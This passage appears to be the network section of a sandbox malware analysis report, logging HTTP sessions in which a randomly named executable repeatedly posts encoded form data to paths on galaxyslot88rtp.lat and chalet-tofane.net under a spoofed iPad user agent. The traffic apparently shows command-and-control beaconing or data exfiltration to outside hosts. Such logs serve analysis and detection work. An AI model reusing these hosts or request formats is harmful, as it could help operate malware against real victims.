                                                                  Data Raw: 45 5a 32 6c 6f 3d 33 62 6f 7a 30 46 77 5a 6f 62 68 41 37 34 37 49 34 72 67 47 71 32 53 4b 4f 6b 56 65 4d 58 59 31 2b 42 53 77 71 41 6d 2b 4c 78 50 4c 51 49 69 54 67 78 61 62 33 52 64 4e 4a 51 34 4d 78 79 35 39 4d 5a 77 5a 43 35 76 64 5a 62 67 69 66 56 50 68 51 71 32 6c 44 2b 54 47 63 42 6b 42 37 39 31 67 6b 49 32 67 64 35 45 63 67 5a 4d 52 6e 62 4f 47 4f 61 6e 64 69 6a 6a 55 48 73 4c 4f 53 63 6a 6d 6e 63 4f 67 4a 5a 38 6a 6f 42 48 5a 52 6e 49 71 66 30 30 43 78 34 6d 6b 76 41 32 6d 55 61 54 48 62 4a 33 6e 77 61 35 6b 4d 4e 45 75 66 68 52 33 4f 41 58 5a 4c 30 4d 74 52 6f 6b 2f 53 4a 56 33 43 6c 2f 59 78 68 63 45 68 65 41 2b 32 2f 36 58 6c 51 3d 3d
                                                                  Data Ascii: EZ2lo=3boz0FwZobhA747I4rgGq2SKOkVeMXY1+BSwqAm+LxPLQIiTgxab3RdNJQ4Mxy59MZwZC5vdZbgifVPhQq2lD+TGcBkB791gkI2gd5EcgZMRnbOGOandijjUHsLOScjmncOgJZ8joBHZRnIqf00Cx4mkvA2mUaTHbJ3nwa5kMNEufhR3OAXZL0MtRok/SJV3Cl/YxhcEheA+2/6XlQ==
                                                                  Oct 7, 2024 10:39:12.676270008 CEST1236INHTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 1251
                                                                  date: Mon, 07 Oct 2024 08:39:12 GMT
                                                                  server: LiteSpeed
                                                                  platform: hostinger
                                                                  strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                  x-xss-protection: 1; mode=block
                                                                  x-content-type-options: nosniff
                                                                  vary: User-Agent
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12
                                                                  Oct 7, 2024 10:39:12.676295996 CEST431INData Raw: 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78
                                                                  Data Ascii: px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by L


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  11192.168.2.104998746.17.172.49806332C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 7, 2024 10:39:14.311151028 CEST1837OUTPOST /zkan/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 1230
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.galaxyslot88rtp.lat
                                                                  Origin: http://www.galaxyslot88rtp.lat
                                                                  Referer: http://www.galaxyslot88rtp.lat/zkan/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Raw: 45 5a 32 6c 6f 3d 33 62 6f 7a 30 46 77 5a 6f 62 68 41 37 34 37 49 34 72 67 47 71 32 53 4b 4f 6b 56 65 4d 58 59 31 2b 42 53 77 71 41 6d 2b 4c 78 48 4c 51 39 32 54 6a 53 69 62 30 52 64 4e 44 77 34 4e 78 79 35 77 4d 59 59 56 43 35 79 6d 5a 5a 6f 69 64 7a 62 68 57 62 32 6c 4b 2b 54 47 44 52 6b 41 2f 39 30 69 6b 4a 47 73 64 35 55 63 67 5a 4d 52 6e 5a 36 47 4b 4a 2f 64 67 6a 6a 56 43 63 4c 4b 57 63 6a 4b 6e 66 2b 65 4a 5a 77 7a 70 77 6e 5a 57 48 34 71 59 42 6f 43 2b 34 6d 36 68 67 32 45 55 61 65 48 62 4a 72 72 77 5a 6c 65 4d 4b 6f 75 50 55 51 57 61 52 48 76 56 6e 45 78 66 49 35 65 41 70 5a 51 46 52 57 4b 79 6a 67 71 78 50 78 72 39 4e 7a 6d 6d 54 51 4a 51 46 6b 66 68 75 68 73 51 48 61 2f 36 76 43 46 57 47 4a 45 67 59 39 4a 6a 57 6d 4a 75 44 34 71 79 42 58 6b 74 30 65 52 33 42 4c 2b 66 51 6d 71 4a 64 7a 6a 59 39 55 58 59 42 77 73 2b 37 44 52 69 4d 73 53 31 51 6b 2f 5a 67 53 6a 68 61 32 67 66 6a 5a 4a 56 68 48 6d 2b 30 76 61 55 53 73 2b 77 69 56 37 46 61 73 49 2f 43 4d 57 57 64 38 69 5a 53 76 30 35 4c 71 54 [TRUNCATED]
                                                                  Data Ascii: EZ2lo=3boz0FwZobhA747I4rgGq2SKOkVeMXY1+BSwqAm+LxHLQ92TjSib0RdNDw4Nxy5wMYYVC5ymZZoidzbhWb2lK+TGDRkA/90ikJGsd5UcgZMRnZ6GKJ/dgjjVCcLKWcjKnf+eJZwzpwnZWH4qYBoC+4m6hg2EUaeHbJrrwZleMKouPUQWaRHvVnExfI5eApZQFRWKyjgqxPxr9NzmmTQJQFkfhuhsQHa/6vCFWGJEgY9JjWmJuD4qyBXkt0eR3BL+fQmqJdzjY9UXYBws+7DRiMsS1Qk/ZgSjha2gfjZJVhHm+0vaUSs+wiV7FasI/CMWWd8iZSv05LqTDyQxlXuzq+3t7hDcaYPdeCnuIP0YgnSvrJnB1n+LESqjmNGepJ5F+ZErnbeXOEp1bE8yakVC+H7PztmxT+Y8L/GbiB/jflQjIJxlgRKhZ/lT0BT1EHnztE6+RhdFyf8dW0Hccuk8EmM2YSAbQm6uD66EsSVVoGULhuZz27BJnXYQhQcNucU+O+7Oq768kN136g7FD+Hf0etnM3I4gvTGy3UDfHZ5Al6g5qZOSPcN4mO6ejYxkcVzvQSUK0M/FlnxGj+oU4716oEcH30qBARDLdijh4B6AZ45/puj32nsoIqpqjtn+3w/AoRp8fYJyxjWjYOlh/buVrtUkcTbYA8b3hD+1uf41d3RFKGkjKHY8pJqpRr8eQc0BqSkEXG1nCF7dow+OwdJEprPC/DBn5Oe53kFYgvaJdZhlT+U+ePqJf52weXGQiufjsWT4RYIdu4c5VSc+C+oX+2HSLKuOV81yqHfK10EeFGSXBsy0qlaCphA06ua73OXU9rhRTFDhZo7oe0WBsBUdG543htcIGZ8teM+3rfm4nXs5cWi6/C5LLzRtQRfeXmtRn9tYj4FLaIzyQEeBkF8vHxcyJEzzgzdFJqHDRAD2t0M8YC+kqY15zJHk0LSHGBuOEDMMCTfRd2YfNba0tVeWOnKa/bpYXM2hM+E3Xsq8tCUdZ [TRUNCATED]
                                                                  Oct 7, 2024 10:39:15.263647079 CEST1236INHTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 1251
                                                                  date: Mon, 07 Oct 2024 08:39:15 GMT
                                                                  server: LiteSpeed
                                                                  platform: hostinger
                                                                  strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                  x-xss-protection: 1; mode=block
                                                                  x-content-type-options: nosniff
                                                                  vary: User-Agent
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12
                                                                  Oct 7, 2024 10:39:15.263684034 CEST431INData Raw: 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78
                                                                  Data Ascii: px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by L


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  12192.168.2.104998846.17.172.49806332C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 7, 2024 10:39:16.850478888 CEST522OUTGET /zkan/?EZ2lo=6ZAT3xIn5pUb7db/tro8oHOZJyMtHS049C+OqD69Fiv/T4rqyATbhBxWGTJ8nzJFC6ZuCLeYMeRBfErXdr+6Npf/MiZpvdt0v4GFRoEaqN4q8s+9XQ==&7NP=7FXXUPl HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  Host: www.galaxyslot88rtp.lat
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Oct 7, 2024 10:39:17.791733980 CEST1236INHTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 1251
                                                                  date: Mon, 07 Oct 2024 08:39:17 GMT
                                                                  server: LiteSpeed
                                                                  platform: hostinger
                                                                  strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                  x-xss-protection: 1; mode=block
                                                                  x-content-type-options: nosniff
                                                                  vary: User-Agent
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12
                                                                  Oct 7, 2024 10:39:17.791762114 CEST431INData Raw: 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78
                                                                  Data Ascii: px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by L


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  13192.168.2.104998962.149.128.40806332C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 7, 2024 10:39:22.895766020 CEST794OUTPOST /vv4m/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 194
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.chalet-tofane.net
                                                                  Origin: http://www.chalet-tofane.net
                                                                  Referer: http://www.chalet-tofane.net/vv4m/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Raw: 45 5a 32 6c 6f 3d 56 46 46 44 44 31 77 41 74 4c 54 6c 74 4c 53 34 37 43 31 65 78 41 74 54 2b 68 48 54 58 64 42 55 2b 7a 54 2b 41 76 64 65 45 74 59 78 2b 69 47 31 56 78 2b 4b 70 78 70 75 74 6b 4f 79 6c 67 6f 41 5a 32 38 55 4a 70 30 56 66 6c 65 59 4a 70 45 46 47 56 6d 42 50 61 69 31 37 5a 53 32 42 6f 68 4e 36 45 34 4c 58 63 75 37 79 7a 49 61 76 45 35 68 2f 35 74 50 6a 69 6c 75 46 54 35 54 59 74 66 4a 70 77 30 4e 6c 44 6e 65 50 6a 70 70 42 75 34 55 49 71 42 7a 55 4f 4c 6e 6b 33 42 2f 54 70 54 74 79 44 32 58 2f 30 6c 66 39 74 30 34 36 36 41 48 2b 52 6a 69 57 4c 54 64 56 38 71 37
                                                                  Data Ascii: EZ2lo=VFFDD1wAtLTltLS47C1exAtT+hHTXdBU+zT+AvdeEtYx+iG1Vx+KpxputkOylgoAZ28UJp0VfleYJpEFGVmBPai17ZS2BohN6E4LXcu7yzIavE5h/5tPjiluFT5TYtfJpw0NlDnePjppBu4UIqBzUOLnk3B/TpTtyD2X/0lf9t0466AH+RjiWLTdV8q7
                                                                  Oct 7, 2024 10:39:23.554140091 CEST1236INHTTP/1.1 404 Not Found
                                                                  Cache-Control: private
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Server: Microsoft-IIS/10.0
                                                                  X-Powered-By: ASP.NET
                                                                  Date: Mon, 07 Oct 2024 08:39:21 GMT
                                                                  Connection: close
                                                                  Content-Length: 4953
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
                                                                  Oct 7, 2024 10:39:23.554162025 CEST1236INData Raw: 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e
                                                                  Data Ascii: r:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5
                                                                  Oct 7, 2024 10:39:23.554178953 CEST1236INData Raw: 3a 69 74 61 6c 69 63 3b 7d 20 0a 2e 63 6c 65 61 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 7d 20 0a 2e 70 72 65 66 65 72 72 65 64 7b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 20 32 70 78 20 35 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61
                                                                  Data Ascii: :italic;} .clear{clear:both;} .preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 -
                                                                  Oct 7, 2024 10:39:23.554233074 CEST1236INData Raw: 6d 61 74 69 6f 6e 3a 3c 2f 68 34 3e 20 0a 20 20 3c 64 69 76 20 69 64 3d 22 64 65 74 61 69 6c 73 2d 6c 65 66 74 22 3e 20 0a 20 20 20 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 20 63 65 6c 6c
                                                                  Data Ascii: mation:</h4> <div id="details-left"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Module</th><td>&nbsp;&nbsp;&nbsp;IIS Web Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandl
                                                                  Oct 7, 2024 10:39:23.554246902 CEST228INData Raw: 64 69 72 65 63 74 6f 72 79 20 61 6e 64 20 74 72 79 20 74 68 65 20 72 65 71 75 65 73 74 20 61 67 61 69 6e 2e 20 0a 20 20 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6f 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 66 77 6c 69 6e
                                                                  Data Ascii: directory and try the request again. <p><a href="https://go.microsoft.com/fwlink/?LinkID=62293&amp;IIS70Error=404,0,0x80070002,17763">View more information &raquo;</a></p> </fieldset> </div> </div> </body> </html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  14192.168.2.104999062.149.128.40806332C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 7, 2024 10:39:25.454433918 CEST818OUTPOST /vv4m/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 218
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.chalet-tofane.net
                                                                  Origin: http://www.chalet-tofane.net
                                                                  Referer: http://www.chalet-tofane.net/vv4m/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Raw: 45 5a 32 6c 6f 3d 56 46 46 44 44 31 77 41 74 4c 54 6c 74 76 57 34 39 68 74 65 35 41 73 68 6e 68 48 54 4e 74 42 51 2b 7a 66 2b 41 71 6b 42 48 66 38 78 2b 44 32 31 53 45 43 4b 73 78 70 75 69 45 4f 72 36 51 70 74 5a 32 42 6e 4a 72 67 56 66 6c 36 59 4a 70 30 46 47 6d 65 47 4a 4b 69 33 69 4a 53 4f 4d 49 68 4e 36 45 34 4c 58 63 4b 52 79 7a 51 61 76 77 39 68 2f 59 74 51 75 43 6c 70 54 44 35 54 53 4e 66 56 70 77 30 72 6c 43 37 34 50 6d 31 70 42 73 51 55 49 62 42 77 62 4f 4c 68 70 58 42 70 53 4a 4b 71 72 54 6d 63 79 33 35 42 38 76 34 72 35 62 68 41 76 41 43 31 46 38 50 54 62 36 66 52 62 41 54 68 30 4f 2b 63 72 54 72 4d 45 6b 41 61 2b 6d 70 6d 2f 41 3d 3d
                                                                  Data Ascii: EZ2lo=VFFDD1wAtLTltvW49hte5AshnhHTNtBQ+zf+AqkBHf8x+D21SECKsxpuiEOr6QptZ2BnJrgVfl6YJp0FGmeGJKi3iJSOMIhN6E4LXcKRyzQavw9h/YtQuClpTD5TSNfVpw0rlC74Pm1pBsQUIbBwbOLhpXBpSJKqrTmcy35B8v4r5bhAvAC1F8PTb6fRbATh0O+crTrMEkAa+mpm/A==
                                                                  Oct 7, 2024 10:39:26.122329950 CEST1236INHTTP/1.1 404 Not Found
                                                                  Cache-Control: private
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Server: Microsoft-IIS/10.0
                                                                  X-Powered-By: ASP.NET
                                                                  Date: Mon, 07 Oct 2024 08:39:24 GMT
                                                                  Connection: close
                                                                  Content-Length: 4953
